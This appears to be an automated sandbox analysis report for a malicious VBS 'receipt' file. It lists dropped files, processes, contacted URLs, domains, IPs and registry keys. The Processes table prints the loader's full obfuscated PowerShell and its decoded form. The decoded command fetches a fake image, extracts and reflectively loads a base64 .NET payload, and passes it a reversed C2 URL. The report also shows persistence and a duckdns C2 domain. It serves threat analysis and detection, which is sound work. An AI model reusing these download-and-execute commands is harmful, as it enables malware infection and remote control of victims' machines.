Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
E7236252-receipt.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\moquenqueiro.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x69475a28, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2FMK3KK3\eCmZ7z04[1].txt
|
Unicode text, UTF-8 text, with very long lines (11104), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czy1kgfw.l21.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_makrtgqn.grx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3dprjsx.wq5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozozatgv.04a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 13:13:28 2023, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:22 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat May 4 06:50:55
2024, mtime=Sat May 4 06:50:55 2024, atime=Sat May 4 06:50:55 2024, length=45984, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\RegSvcs.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 79
|
ASCII text, with very long lines (2294)
|
downloaded
|
||
|
Chrome Cache Entry: 80
|
ASCII text, with very long lines (3738)
|
downloaded
|
||
|
Chrome Cache Entry: 81
|
ASCII text
|
downloaded
|
||
|
Chrome Cache Entry: 82
|
ASCII text, with very long lines (3572), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 83
|
ASCII text, with very long lines (65531)
|
downloaded
|
||
|
Chrome Cache Entry: 84
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 85
|
ASCII text, with very long lines (2124)
|
downloaded
|
||
|
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
|
data
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\samr
|
GLS_BINARY_LSB_FIRST
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\wkssvc
|
GLS_BINARY_LSB_FIRST
|
dropped
|
There are 22 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreeQBhDgTreG0DgTrebwB3DgTreHgDgTreLwBtDgTreG4DgTreLwBtDgTreG8DgTreYwDgTreuDgTreDcDgTreMgBlDgTreHYDgTrebDgTreBvDgTreHYDgTreZQDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreG0DgTrebwBxDgTreHUDgTreZQBuDgTreHEDgTredQBlDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreFMDgTredgBjDgTreHMDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))}
}"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1836,i,15139392700974412451,17984429462301809972,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xwormay8450.duckdns.org
|
|
||
|
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
104.21.45.138
|
|
|
|
http://app01.system.com.br/RDWeb/Pages/login.aspx
|
unknown
|
|
|
|
https://pastebin.com/raw/eCmZ7z04
|
104.20.3.235
|
||
|
http://www.broofa.com
|
unknown
|
||
|
https://pastebin.com/t8l
|
unknown
|
||
|
https://pastebin.com/raw/eCmZ7z04H
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxcho
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://www.google.com/async/newtab_promos
|
142.250.68.68
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
|
unknown
|
||
|
https://www.evolve27.com/nm/xwomay.txt
|
131.153.147.50
|
||
|
https://plus.google.com
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxd
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
https://www.google.com/async/ddljson?async=ntp:2
|
142.250.68.68
|
||
|
https://play.google.com/log?format=json&hasfast=true
|
unknown
|
||
|
https://pastachiotabin.com/raw/achiotaCmZ7z04
|
unknown
|
||
|
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
|
142.250.68.68
|
||
|
https://csp.withgoogle.com/csp/lcreport/
|
unknown
|
||
|
https://pastebin.com/raw/eCmZ7z04bH
|
unknown
|
||
|
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0
|
142.250.68.46
|
||
|
https://pastebin.com/raw/eCmZ7z04tart
|
unknown
|
||
|
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
|
142.250.68.68
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://pastebin.com/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://domains.google.com/suggest/flow
|
unknown
|
||
|
https://clients6.google.com
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xwormay8450.duckdns.org
|
12.221.146.138
|
|
|
|
uploaddeimagens.com.br
|
104.21.45.138
|
|
|
|
www.evolve27.com
|
unknown
|
|
|
|
evolve27.com
|
131.153.147.50
|
||
|
plus.l.google.com
|
142.250.68.46
|
||
|
www.google.com
|
142.250.68.68
|
||
|
pastebin.com
|
104.20.3.235
|
||
|
apis.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.45.138
|
uploaddeimagens.com.br
|
United States
|
|
|
|
192.168.2.3
|
unknown
|
unknown
|
|
|
|
12.221.146.138
|
xwormay8450.duckdns.org
|
United States
|
|
|
|
104.20.3.235
|
pastebin.com
|
United States
|
||
|
192.168.2.9
|
unknown
|
unknown
|
||
|
142.250.68.68
|
www.google.com
|
United States
|
||
|
142.250.68.46
|
plus.l.google.com
|
United States
|
||
|
192.168.2.5
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
131.153.147.50
|
evolve27.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
There are 1 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
